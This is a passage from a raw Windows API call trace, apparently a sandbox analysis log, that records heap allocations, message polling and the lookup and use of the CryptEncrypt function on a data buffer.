hHeap=0x970000) returned 1 [0235.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0235.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0235.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0235.944] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0235.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0235.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0235.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0235.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0235.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0235.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0235.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0235.944] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0235.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0235.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f041c0 [0235.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0235.945] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0235.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0235.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0235.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0235.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bc8 [0235.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0235.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0235.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0235.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0235.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd180) returned 0x2f14818 [0235.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0235.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d18 [0235.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0235.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0235.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0235.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e550e8 [0235.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0235.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0235.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0235.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e550a8 [0235.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0235.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0235.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0235.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ec0 [0235.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0235.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0235.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0235.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0235.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0235.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd180) returned 0x2f2eb28 [0235.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f530 [0235.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0235.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0235.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0235.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6c0 [0235.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0235.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f490 [0235.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0235.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0235.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0235.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0235.948] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0235.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0235.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0235.948] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0235.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0235.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0235.948] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0235.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0235.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0235.949] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0235.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0235.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4b8 | out: hHeap=0x970000) returned 1 [0235.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0235.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0235.949] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0235.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0235.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0235.949] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.949] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0235.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f788 | out: hHeap=0x970000) returned 1 [0235.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0235.950] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0235.950] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0235.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04700 | out: hHeap=0x970000) returned 1 [0235.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0235.950] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0235.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0235.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0235.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0235.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0235.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0235.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0235.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0235.950] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0235.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0235.950] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0235.951] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0235.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f042d8 | out: hHeap=0x970000) returned 1 [0235.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0235.951] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0235.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0235.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0235.951] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0235.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0235.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0235.951] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0235.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0235.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0235.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0235.951] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.952] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0235.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0235.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0235.952] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0235.952] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0235.952] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0235.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f040e0 | out: hHeap=0x970000) returned 1 [0235.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0235.952] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0235.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0235.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0235.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0235.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0235.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0235.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0235.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0235.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0235.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0235.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0235.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0235.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0235.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0235.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f760 | out: hHeap=0x970000) returned 1 [0235.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0235.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0235.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0235.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0235.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0235.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0235.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0235.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f3bcb0 | out: hHeap=0x970000) returned 1 [0235.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0235.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0235.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0235.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0235.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0235.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0235.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0235.955] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0235.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0235.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0235.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0235.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0235.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0235.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0235.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0235.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0235.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0235.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0235.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0235.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0235.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0235.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0235.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0235.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0235.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0235.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0235.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0235.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0235.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0235.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0235.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0235.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0235.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0235.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0235.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0235.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0235.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0235.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0235.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0235.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0235.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0235.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0235.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e514a8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0235.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0235.958] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0235.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0235.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0235.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e7f698 [0235.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0235.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0235.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0235.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0235.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0235.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0235.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551b8 [0235.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0235.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0235.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0235.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0235.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0235.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0235.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551b8 | out: hHeap=0x970000) returned 1 [0235.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0235.960] CryptEncrypt (in: hKey=0xa872d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xd180, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xd188) returned 1 [0235.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0235.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0235.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55118 [0235.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0235.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0235.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0235.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55128 [0235.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0235.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55128 | out: hHeap=0x970000) returned 1 [0235.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0235.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0235.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0235.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0235.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55178 [0235.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0235.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: 